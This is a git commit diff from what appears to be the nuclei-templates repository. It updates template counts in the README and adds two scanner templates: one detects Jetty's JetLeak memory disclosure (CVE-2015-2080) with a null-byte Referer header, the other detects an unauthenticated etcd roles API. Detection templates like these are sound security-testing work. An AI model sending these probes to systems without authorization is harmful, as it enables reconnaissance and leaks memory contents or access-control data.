Merge branch 'master' into more-templates
commit
c31a2c9f6c
|
@ -38,12 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||
| cves | 231 | vulnerabilities | 105 | exposed-panels | 104 |
|
||||
| exposures | 61 | technologies | 50 | misconfiguration | 53 |
|
||||
| cves | 232 | vulnerabilities | 105 | exposed-panels | 103 |
|
||||
| exposures | 61 | technologies | 50 | misconfiguration | 54 |
|
||||
| workflows | 23 | miscellaneous | 16 | default-logins | 18 |
|
||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||
| helpers | 2 | takeovers | 1 | - | - |
|
||||
|
||||
**72 directories, 696 files**.
|
||||
**72 directories, 697 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2015-2080
|
||||
|
||||
info:
|
||||
name: Eclipse Jetty Remote Leakage
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-2080
|
||||
description: |
|
||||
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
headers:
|
||||
Referer: "\x00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 400
|
||||
- type: word
|
||||
words:
|
||||
- "Illegal character 0x0 in state"
|
||||
part: body
|
|
@ -0,0 +1,29 @@
|
|||
id: http-etcd-unauthenticated-api-data-leak
|
||||
|
||||
info:
|
||||
name: etcd Unauthenticated HTTP API Leak
|
||||
author: dhiyaneshDk
|
||||
severity: high
|
||||
reference: https://hackerone.com/reports/1088429
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/v2/auth/roles"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"roles"'
|
||||
- '"permissions"'
|
||||
- '"role"'
|
||||
- '"kv"'
|
||||
condition: and
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/plain"
|
Loading…
Reference in New Issue